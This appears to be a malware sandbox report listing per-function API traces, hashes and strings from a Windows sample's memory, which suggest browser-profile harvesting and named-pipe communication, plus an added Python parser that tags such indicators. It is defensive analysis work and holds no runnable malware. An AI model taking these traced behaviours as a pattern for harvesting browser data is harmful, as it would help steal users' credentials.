  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
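The blocks on this page all share one layout: a Similarity header with its IDs, an APIs list in which lines prefixed "Part of subcall function" belong to a callee rather than to the function itself, an optional Strings list with xrefs, and the memory dump region the function was lifted from. The script below is an added example, not part of the Joe Sandbox report and not Joe Sandbox code. It parses that layout into records and tags functions whose strings and API reach match what a practitioner would hunt for here, such as the Firefox profile path combined with FindFirstFileW/FindNextFileW in the block ending on the line above. The sample input is constructed from lines on this page and abridged; the regex, the tag names and the API groupings are this example's own assumptions.

```python
"""Parse the per-function "Similarity" blocks of a Joe Sandbox report and tag them.

Added example, not Joe Sandbox's own code or verdict logic. It assumes the layout seen on
this page: a block runs from "Similarity" to its "Memory Dump Source" entry, with "APIs" and
"Strings" subsections between; "Part of subcall function XXXX:" lines belong to the callee.
The tag names and the API/string groupings used for tagging are this example's own.
"""
import re
from dataclasses import dataclass, field
from typing import List

# Constructed sample input, assembled from lines that appear on this page (abridged).
SAMPLE_REPORT = """\
Similarity
  • Total matches: 19
  • String ID: %APPDATA%\\Mozilla\\Firefox\\Profiles
  • API String ID: 2346524515-3215297822
APIs
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\\Mozilla\\Firefox\\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
Strings
  • %APPDATA%\\Mozilla\\Firefox\\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
APIs
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • GetLastError.KERNEL32 ref: 001CBE07
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
"""

# "• [Part of subcall function XXXX: ]Name.MODULE(args), ref: XXXX"; the "(args)" part is optional.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<callee>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                      # call-site address as printed in the report
    callee: str = ""              # non-empty for "Part of subcall function" lines

@dataclass
class FunctionBlock:
    meta: dict = field(default_factory=dict)   # Total matches, String ID, API String ID, Source File, ...
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    def api_names(self, include_subcalls: bool = True) -> set:
        return {a.name for a in self.apis if include_subcalls or not a.callee}

def parse_report(text: str) -> List[FunctionBlock]:
    blocks: List[FunctionBlock] = []
    block, section = None, ""
    for head in (ln.strip() for ln in text.splitlines()):
        if head == "Similarity":                       # every block starts here
            block = FunctionBlock()
            blocks.append(block)
            section = "meta"
        elif block is None or not head:
            continue
        elif head in ("APIs", "Strings", "Memory Dump Source"):
            section = head
        elif section == "APIs":
            m = API_LINE.match(head)
            if m:                                      # lines the regex cannot read are skipped
                args = m["args"].split(",") if m["args"] else []
                block.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["callee"] or ""))
        elif section == "Strings":                     # "• <string>, xrefs: 001C6CA7"
            block.strings.append(head.lstrip("•").strip().rsplit(", xrefs:", 1)[0])
        else:                                          # "• Key: value" metadata lines
            key, _, value = head.lstrip("•").strip().partition(":")
            block.meta[key.strip()] = value.strip()
    return blocks

# Hunting heuristics: this example's own groupings, not Joe Sandbox's classifiers.
BROWSER_PROFILE_MARKERS = ("\\mozilla\\firefox\\profiles",)
FILE_ENUM_APIS = {"FindFirstFileA", "FindFirstFileW", "FindNextFileA", "FindNextFileW"}
FILE_DELETE_APIS = {"DeleteFileA", "DeleteFileW"}

def tag_block(block: FunctionBlock) -> List[str]:
    tags: List[str] = []
    text = " ".join([block.meta.get("String ID", "")] + block.strings).lower()
    if any(marker in text for marker in BROWSER_PROFILE_MARKERS):
        tags.append("browser-profile-path")
        if block.api_names() & FILE_ENUM_APIS:         # subcalls count: reach, not only direct calls
            tags.append("enumerates-browser-profile")
    if block.api_names(include_subcalls=False) & FILE_DELETE_APIS:
        tags.append("deletes-file")
    return tags

def find_indicators(blocks: List[FunctionBlock]) -> dict:
    """Map API String ID -> tags for every block that earned at least one tag."""
    return {b.meta.get("API String ID", ""): tag_block(b) for b in blocks if tag_block(b)}
```

To run it over a saved report, pass the file contents to `parse_report` (read it as UTF-8, since the bullets are non-ASCII). The API String ID is used as the record key because every block on this page prints one; a block that earns no tag is simply left out of the result, and an API line the regex cannot read is skipped rather than treated as an error, so unusual formatting degrades the tagging instead of aborting it.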
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
